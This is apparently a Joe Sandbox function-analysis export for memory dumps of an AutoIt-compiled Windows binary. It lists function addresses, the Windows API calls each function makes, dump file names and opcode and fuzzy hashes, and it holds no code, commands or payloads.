Opcode Fuzzy Hash: 434645b4f853b18efcca52cbbdaf31de7e7cdc41de85d2ebc7ec469a705c9a02
Instruction Fuzzy Hash: 5F110275A20219AFCB04EF98DC89DBE77BCEB04300F540456E951E7192C731AA618FA5

Function 002596F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00259719
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0025972B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00259741
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0025975C

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4aa7b1bc575941311cb84c51ea1a2ad217d01198113cca8b2cb15612d59acd06
Instruction ID: 269ba31101bec6c2c3f281011790a1775227f3d7c347f0cf1158fe6587087dcf
Opcode Fuzzy Hash: 4aa7b1bc575941311cb84c51ea1a2ad217d01198113cca8b2cb15612d59acd06
Instruction Fuzzy Hash: 99115A7A910218FFEB10DF95CD84E9DFBB8FB48710F204092E904B7290D6716E60DB94

Function 00202111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0020214F
GetStockObject.GDI32(00000011), ref: 00202163
SendMessageW.USER32(00000000,00000030,00000000), ref: 0020216D

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 4f44485e2678a05e6985a398f8866555113512e1d6382fa477e5fb44c940b38a
Instruction ID: a8c85eccba60202d7a430388d34da7e15fc144111c526f1af8fb7762a0a2566f
Opcode Fuzzy Hash: 4f44485e2678a05e6985a398f8866555113512e1d6382fa477e5fb44c940b38a
Instruction Fuzzy Hash: 4F118B7211120DBFDB024F94AC88EEABB69EF58364F040202FB1852092C7319C61AFA0

Function 00261941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002604EC,?,0026153F,?,00008000), ref: 0026195E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,002604EC,?,0026153F,?,00008000), ref: 00261983
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002604EC,?,0026153F,?,00008000), ref: 0026198D
Sleep.KERNEL32(?,?,?,?,?,?,?,002604EC,?,0026153F,?,00008000), ref: 002619C0

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: d67fbe8cdf63e04c1baae32a62af8b7b9e7d777b4783c84348a81419f51c6069
Instruction ID: fa021bae63ee5399d42d56e694fd3e862f8605d73fcf7838b51836f48c2f621a
Opcode Fuzzy Hash: d67fbe8cdf63e04c1baae32a62af8b7b9e7d777b4783c84348a81419f51c6069
Instruction Fuzzy Hash: 80117C31C1152DEBCF009FE4E998AEEBB78FF08701F04414AE984B2240CB30A6B0CB95

Function 0028E1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0028E1EA
LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0028E201
RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0028E216
RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0028E234

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 1cce5776d73ff44240479fac29b58530adf4ddd5b07b3bfd4492fe492103b7b9
Instruction ID: ca908eb0701ddef2b91ab32d7e7fd6e24671a518ce98c63d59c0856133919457
Opcode Fuzzy Hash: 1cce5776d73ff44240479fac29b58530adf4ddd5b07b3bfd4492fe492103b7b9
Instruction Fuzzy Hash: 9611A5B8216308DFE7309F50EC0CF93BBBCEF00B10F10855AAA15D6095D7B0E9149B91

Function 002371E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0023720B

Part of subcall function 002378F2: __fltout2.LIBCMT ref: 0023791B

__cftog_l.LIBCMT ref: 00237231
__cftoe_l.LIBCMT ref: 00237263

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 2e6c9fc4be300e887aa829d7f3ec8c7909d91062b8762f517aa7d07683996b62
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: C60149B206824EBBCF226E84CC418EE3F62BB19354F588515FE1868131D376C9B1BF91

Function 0028B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0028B956
ScreenToClient.USER32(?,?), ref: 0028B96E
ScreenToClient.USER32(?,?), ref: 0028B992
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0028B9AD

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 6eacf9c16f38eefcee0897b8b7788d08599e05c214e135cdbd389a62e87c41cc
Instruction ID: 64bc4fbf77d9a5d3b636fe203fabe124d45e70a917b38485d2be331b67999a62
Opcode Fuzzy Hash: 6eacf9c16f38eefcee0897b8b7788d08599e05c214e135cdbd389a62e87c41cc
Instruction Fuzzy Hash: 951132B9D0020EEFDB41DF98D984AEEBBB9FB48210F104156E914E2610D735AA658F50

Function 0028BCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0028BCB6
_memset.LIBCMT ref: 0028BCC5
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002C8F20,002C8F64), ref: 0028BCF4
CloseHandle.KERNEL32 ref: 0028BD06

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 68079aa2b4795bcf20f74c9e9caf0d264e246f8db2c31bad8201a5b6d0075d65
Instruction ID: 5aa4dbb13ac34074af1a85e0922e4d87c766780e98fe39548a4070ef4b94f788
Opcode Fuzzy Hash: 68079aa2b4795bcf20f74c9e9caf0d264e246f8db2c31bad8201a5b6d0075d65
Instruction Fuzzy Hash: 39F0E2B21103047FE3502B60BC09FBB3A5DEB08710F408529BA48E54A2DB754C2087B8

Function 00267195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 002671A1

Part of subcall function 00267C7F: _memset.LIBCMT ref: 00267CB4

_memmove.LIBCMT ref: 002671C4
_memset.LIBCMT ref: 002671D1
LeaveCriticalSection.KERNEL32(?), ref: 002671E1

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 51f86d4f8825fac4ce12e1a9e669cb9766d184484456edb389f48b0c57a04fff
Instruction ID: 2c7ecd98c604d01b0b07fc9a4b27b469357e7e4b317ad94fddac8baa59516466
Opcode Fuzzy Hash: 51f86d4f8825fac4ce12e1a9e669cb9766d184484456edb389f48b0c57a04fff
Instruction Fuzzy Hash: C6F0D076100114AFCB416F95EC89E4ABB29EF45360F048056FE085E26AC735A961DFB4

Function 0028C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 002016CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00201729
Part of subcall function 002016CF: SelectObject.GDI32(?,00000000), ref: 00201738
Part of subcall function 002016CF: BeginPath.GDI32(?), ref: 0020174F
Part of subcall function 002016CF: SelectObject.GDI32(?,00000000), ref: 00201778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0028C3E8
LineTo.GDI32(00000000,?,?), ref: 0028C3F5
EndPath.GDI32(00000000), ref: 0028C405
StrokePath.GDI32(00000000), ref: 0028C413

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 88036a50490de8bbb300e791eba266a19ef15ee7df8792b56f8fe5c2d737450b
Instruction ID: 3f8d4d79191e8f704d6d909818b7255bf29f710e0d05ae5b2e94834da93dc741
Opcode Fuzzy Hash: 88036a50490de8bbb300e791eba266a19ef15ee7df8792b56f8fe5c2d737450b
Instruction Fuzzy Hash: 0EF0B83200622DBADB122F50BC0EFDE3F69AF06310F048002FA11211E283B515A0EFA9

Function 0025AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0025AA6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 0025AA82
GetCurrentThreadId.KERNEL32 ref: 0025AA89
AttachThreadInput.USER32(00000000), ref: 0025AA90

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 7ea4e316d6d49f4507f8ae612e51d4fbfe04920cb0cc066126de07f9dfef6e57
Instruction ID: 6e2c041a2874ce3fd1de0adf85ad2537901518213cd9b644b13ec623499861f2
Opcode Fuzzy Hash: 7ea4e316d6d49f4507f8ae612e51d4fbfe04920cb0cc066126de07f9dfef6e57
Instruction Fuzzy Hash: 98E0393254122CBADB215FA2AD0DEEB3F2CEF117A2F008112F90984060C7718564CBA0

Function 002025F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0020260D
SetTextColor.GDI32(?,000000FF), ref: 00202617
SetBkMode.GDI32(?,00000001), ref: 0020262C
GetStockObject.GDI32(00000005), ref: 00202634
GetWindowDC.USER32(?,00000000), ref: 0023C1C4
GetPixel.GDI32(00000000,00000000,00000000), ref: 0023C1D1
GetPixel.GDI32(00000000,?,00000000), ref: 0023C1EA
GetPixel.GDI32(00000000,00000000,?), ref: 0023C203
GetPixel.GDI32(00000000,?,?), ref: 0023C223
ReleaseDC.USER32(?,00000000), ref: 0023C22E

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 18ffe7189bf9a91ca92ee309ac9ab56a1e1ae622f2f3a011ac5d51a451e3706d
Instruction ID: 27f05052d2d1ad290c79ffaa1aa1d04187cefd88f26f77408a3ac62cd84b685a
Opcode Fuzzy Hash: 18ffe7189bf9a91ca92ee309ac9ab56a1e1ae622f2f3a011ac5d51a451e3706d
Instruction Fuzzy Hash: D9E06D32604248BFDF215FA8BC8DBD83B11EB05332F148367FA6D580E287724990DB11

Function 00259330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00259339
OpenThreadToken.ADVAPI32(00000000,?,?,?,00258F04), ref: 00259340
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00258F04), ref: 0025934D
OpenProcessToken.ADVAPI32(00000000,?,?,?,00258F04), ref: 00259354

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 04540f7b43f1258adb25fe3598c78a303006624a6c1c4b92999547bf5f7e1f06
Instruction ID: 62181541f42a2dd053489a6e78307fc48b3d1c4370259bfc7b3d7235925ef6e6
Opcode Fuzzy Hash: 04540f7b43f1258adb25fe3598c78a303006624a6c1c4b92999547bf5f7e1f06
Instruction Fuzzy Hash: A1E08632601215EFD7201FB1BD4DB5A3B6CEF50792F104899B645C9090E7349444C754

Function 00240679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00240679
GetDC.USER32(00000000), ref: 00240683
GetDeviceCaps.GDI32(00000000,0000000C), ref: 002406A3
ReleaseDC.USER32(?), ref: 002406C4

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c6a0db6ed4891daf5425580112171eb3d5a814f1b2664e3858dc9949fcaeaf4a
Instruction ID: dc2600d124976130aadd90a4a6337f9a16222407831ee4def8699285018371b5
Opcode Fuzzy Hash: c6a0db6ed4891daf5425580112171eb3d5a814f1b2664e3858dc9949fcaeaf4a
Instruction Fuzzy Hash: E3E01AB2810308EFCB019F64E88CA5D7BF9EF8C310F11800AF95AE7250CB7895619F50

Function 0024068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0024068D
GetDC.USER32(00000000), ref: 00240697
GetDeviceCaps.GDI32(00000000,0000000C), ref: 002406A3
ReleaseDC.USER32(?), ref: 002406C4

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 0b0ec4d6d00ce26adbb1759cf5d1d4bd7196fd0690a91fa699ebf72caabd7438
Instruction ID: 9b6df97194def0e5abd8a3ab56f8320d021fd6e9f1957eebe95f5ebcaff0d61c
Opcode Fuzzy Hash: 0b0ec4d6d00ce26adbb1759cf5d1d4bd7196fd0690a91fa699ebf72caabd7438
Instruction Fuzzy Hash: C1E012B2800208EFCB019FA4E88CA9D7BF9AF8C310F10800AF95AE7250CB7895618F50

Function 0025BE8C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0025C057

Strings

Container, xrefs: 0025BFD4
AutoIt3GUI, xrefs: 0025BFCF

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 40552bef6b72a247c971f70e4544ab9d04b488ade7d8428cea1d4b55974e833f
Instruction ID: db667e42480f7f4ad8664813d5ad21be06230a25ced15eef27ca435f771a1e2c
Opcode Fuzzy Hash: 40552bef6b72a247c971f70e4544ab9d04b488ade7d8428cea1d4b55974e833f
Instruction Fuzzy Hash: 9B915770220702AFDB14CF64C884A6ABBF4FF49711F20846EF90ADB691EB71E855CB54

Function 0026B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0021436A: _wcscpy.LIBCMT ref: 0021438D

Part of subcall function 00204D37: __itow.LIBCMT ref: 00204D62
Part of subcall function 00204D37: __swprintf.LIBCMT ref: 00204DAC

__wcsnicmp.LIBCMT ref: 0026B670
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0026B739

Strings

LPT, xrefs: 0026B66A

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 385278bff1aa2f17a135519126821ba5198574f0f93bc0c8cefcad67631bae73
Instruction ID: aceb8ae1ded0efc6f892c40e73e39df58e3c4cdf50f27c8794b1661b11e77b48
Opcode Fuzzy Hash: 385278bff1aa2f17a135519126821ba5198574f0f93bc0c8cefcad67631bae73
Instruction Fuzzy Hash: 0B616376A20219AFCB16EF54C891EAEB7B4EF48710F108059F906EB291D770AED1CF54

Function 00247190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00247237
_memmove.LIBCMT ref: 00247291

Strings

#V!, xrefs: 0024730B, 0024CAB3, 0024CACF

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _memmove
String ID: #V!
API String ID: 4104443479-1707264807
Opcode ID: 030e5ecaea30251eb8bc111539f9b5664425ca0ebc1c47412bbe00847312383b
Instruction ID: 45d777b6fe3bce2cdee8e8f3c75b5c96d7d8db94b4e209bf14b9f68a69307f23
Opcode Fuzzy Hash: 030e5ecaea30251eb8bc111539f9b5664425ca0ebc1c47412bbe00847312383b
Instruction Fuzzy Hash: D8519470D2061ADFCF24CFA8D884AAEBBF1FF45304F244529E85AD7250E770A9A5CB51

Function 0020E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0020E01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 0020E037

Strings

@, xrefs: 0020E02B

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

